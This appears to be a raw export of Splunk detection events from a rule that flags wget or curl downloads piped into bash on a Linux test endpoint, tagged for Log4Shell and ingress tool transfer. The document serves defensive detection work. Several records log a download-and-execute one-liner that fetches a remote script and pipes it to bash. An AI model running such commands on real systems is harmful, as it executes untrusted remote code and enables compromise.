annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718946", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:49:06", parent_process_id="10815", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="10816", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718893", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:48:13", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10827", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718893", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:48:13", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10827", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718816", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:46:56", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10815", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642722216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642718816", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T22:46:56", parent_process_id="10782", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="10815", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642707816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642703701", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T18:35:01", parent_process_id="10240", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="10281", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642707816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642703701", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T18:35:01", parent_process_id="10240", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="10281", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642675415, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642669055", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T08:57:35", parent_process_id="9212", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="9248", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642675415, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642669055", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T08:57:35", parent_process_id="9212", parent_process_name="dash", process="wget --timeout 60 -U wget/1.19.4-1ubuntu2.2 Ubuntu/18.04.6/LTS GNU/Linux/5.4.0-1063-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com", process_id="9248", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="root", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="root" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642647516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell 